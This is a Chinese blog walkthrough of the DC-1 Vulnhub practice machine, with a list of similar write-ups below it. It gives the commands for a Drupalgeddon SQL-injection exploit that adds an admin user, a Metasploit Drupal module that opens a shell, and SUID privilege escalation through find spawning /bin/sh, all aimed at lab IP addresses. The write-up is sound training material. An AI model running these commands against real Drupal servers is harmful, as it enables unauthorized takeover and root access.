dc-1靶机渗透

最新推荐文章于 2023-12-20 22:43:16 发布
最新推荐文章于 2023-12-20 22:43:16 发布
阅读量831 收藏
点赞数
文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56805195/article/details/125684297
版权

kali攻击机ip:192.168.10.87
dc-1靶机ip:192.168.10.72
一:信息收集
1.扫描该网段存活主机
在这里插入图片描述
这里有很多主机,怎么辨别我们的靶机呢?查看主机靶机的mac地址与扫描到的主机对应即可得到靶机ip
在这里插入图片描述
在这里插入图片描述2.扫描靶机信息,可以看到靶机开启了ssh
在这里插入图片描述
3.登录上去看看在这里插入图片描述查下 drupal 7
searchsploit drupal 7 发现存在sql注入 添加用户名和密码
在这里插入图片描述

python2.7 34992.py
添加一个用户名ms,密码al 的用户
python2.7 34992.py -t http://192.168.10.72 -u ms -p al
顺利在网页上登录
在这里插入图片描述

在这里插入图片描述进去看了下没啥可利用的

二:拿到shell
1.利用msfconsole搜索drupal

search drupal

在这里插入图片描述2.先查看信息设置RHOST最后利用模块1获取shell

show options

在这里插入图片描述set RHOST 192.168.10.72
在这里插入图片描述3.运行获取shell

use 1 
run

在这里插入图片描述4.交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述三:提权
查看u=s位的文件

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述直接拿到root权限
find . -exec /bin/sh \; -quit
在这里插入图片描述查看root下面的文件信息,直接拿到最终flag
在这里插入图片描述

沐122
关注
DC-1内网靶机渗透
weixin_42373409的博客
01-12 525
DC-1内网靶机渗透 实验环境: 靶机DC-1 渗透机:kali 2020; 实验内容: 首先下载并启动我们的靶机; 1.由于我们进行内网渗透,并且不知道靶机的IP地址,所以我们先进行arp扫描,确定靶机IP地址,arp扫描命令为:arp-scan -l 2.确定了我们靶机的IP地址为192.168.131.136之后,首先要考虑的是它开放了那些端口提供了哪些服务,所以首选用nmap工具进行扫描开放端口 命令:nmap -A 192.168.131.136 3.用namp扫描之后,我们发现靶机开放了22、
Vulnhub-DC-1靶机渗透练习
weixin_52451257的博客
11-15 4233
DC-1 第一步:信息收集 nmap -sn 192.168.231.0/24 (进行存活主机发现) nmap -A -p- 192.168.231.142 (进行针对靶机的详细信息收集查看靶机开放了那些端口) dirb -http://192.168.231.142 nikto -h http://192.168.231.142 (敏感信息发现,cms是drupal7.0版本) 第二部:漏洞利用 msf 搜索关于drupal的相关漏洞. 我可能是歪打正着,上...
VULNHUB靶机渗透--DC-1(drupal)
aarong的博客
12-16 1052
1. nmap扫描 nmap -A 192.168.65.131 发现开启了22、80、111端口 2. 浏览器打开靶机开启的网站服务 发现是一个网站登陆界面 3. whatweb扫描出网站模板信息 网站模板是drupal,版本信息是drupal 7 4. 针对这个版本搜索渗透模块 searchsploit drupal 7 运用这个渗透模块: Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (Add Admin User) cat /us
Vulnhub DC-1靶机渗透攻击过程演练
zhongxj183的博客
11-29 3062
Vulnhub DC-1靶机渗透攻击过程演练 DC-1介绍 Vulnhub 社区上收集了很多由世界各地的安全爱好者提供的靶机环境,DC-1 就是其中之一。通过对靶机的攻击挑战,加强了解渗透攻击的过程思路,总结渗透测试经验。 在介绍中了解到,DC-1靶机总共有5个flag,最终目标是在root目录中找到并读取flag。可以不用root用户,但是需要root用户权限。 环境准备 序号 名称 用途 备注 1 DC-1靶机 受攻击主机 VMware环境部署 2 Kali 攻击主机 VMwar
DC -1靶机复盘
2301_79118231的博客
10-21 61
(使用find命令,find命令在/目录下面,-perm 按文件的权限来查找,-u=s 是表示对该文件有shell uid权限,2>/dev/null 错误从定向到null)使用此命令回车后可以看见一些有权限的文件,在这里使用/usr/bin/find 这个文件。然后要了解这是什么系统,版本,用什么编写的,可使用 指纹搜索(Wappalyzer)进行查看,使用此命令查找漏洞,用查找到的漏洞进行尝试利用,在这里使用34992.py 这个添加用户的漏洞。通过此命令可以查看配置,目前配置是本地的,
DC-1靶机渗透测试
最新发布
Liumx0105的博客
12-20 947
思路:信息收集→漏洞探测→漏洞利用→提权
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1233
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1靶机渗透笔记
qq_60600840的博客
08-08 243
DC-1靶机安全渗透靶机
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1428
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2809
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2897
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
靶场练习第九天~vulnhub靶场之dc-1
qq_57976347的博客
02-03 947
一、环境搭建 靶场下载链接: 百度网盘 请输入提取码 提取码: ih67 1.查看kali的ip:ifconfig 二、信息收集 1.使用namp命令 主机探测: nmap -sP 192.168.101.0/24 正在上传…重新上传取消 查看靶机开放端口号和服务:nmap -A 192.168.101.111 发现开放80端口,访问一下192.168.101.111 Drupal简介: Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到
DC-1渗透实战(详细过程)
tzyyyyyy的博客
10-13 1361
DC-1靶机渗透实战 利用各种姿势方法获取最终flag
我爱做靶机DC-1
shy的博客
05-25 347
下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 主机发现 端口扫描 发现开启了22 80 443端口,访问80端口,发现是Drupal cms 访问nmap中扫描出来的robots.txt文件 在UPGRADE.txt发现drupal版本为7.x 使用kali中的searchsploit搜索关于drupal 7的漏洞 使用/usr/share/exploitdb/exploits/php/webapps/34992...
vulnhub渗透系列之DC(一) :内含suid的三种提权方法
来到了学渣的博客
01-25 2974
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难,参考了很多资料做了很长的时间才解决 2.对端口信息扫描,探测存在22和80端口,但22端口ssh爆破无果,登录网站后发现是Drupal框 架,版本是7.x但不确定是哪个x 3.利用searchsp...
初试DC-1靶机渗透
kimoro_x的博客
04-20 655
1.下载DC-1靶机 2.将DC-1.ova导入到VirtualBox中(具体流程不再赘述) 3.将靶机和kali(我的是在VMware下的)设置在同一网段下(具体步骤可参考此链接 4.用ifconfig查看本机IP 5.用netdiscover -r ip/netmask来探测靶场IP 6.经测试192.168.56.101为目标靶机ip,于是我们可以使用nmap -sV 192.168.5...
DC-1靶机渗透学习
里丘~班诺的小屋
08-31 2800
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
DC-1靶机渗透
m0_62008601的博客
04-28 3638
攻击机:kali IP:192.168.56.102 靶机DC-1 IP:192.168.56.101 我的DC-1是在virtualbox打开的,导入VMware的话,扫描ip的时候扫不出来(不一定每个人都是这样)网络设置的是仅主机网络 kali是在VMware里的,网络设置为桥接模式,这样也能确保在同一c段,就能扫得出结果。 在ka...
找不到靶机的IP怎么办,教你几步就会了
热门推荐
qq_20765511的博客
02-23 1万+
家人们最近从老家回来正在找工作,没时间,现在才开始写笔记 之前我学渗透的时候看着看着后面很简单,但是第一步就没了,找不到IP地址,这就很烦了,然后我在网上找,什么进入管理者界面修改啊什么的,但是我照着做了一遍,就是不知道IP是什么,不需要搞那些花里胡哨的东西 我教你个很简单的方法 我这个靶机是找朋友要的,所以我不知道IP地址,我看他们都是开机就会直接显示IP地址没有,我得自己找 一般来说靶机通常不会太大,通常是用 VirtualBox 这个虚拟机 打开来就是这样 你只需要在虚拟机VirtualBox 靶机
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值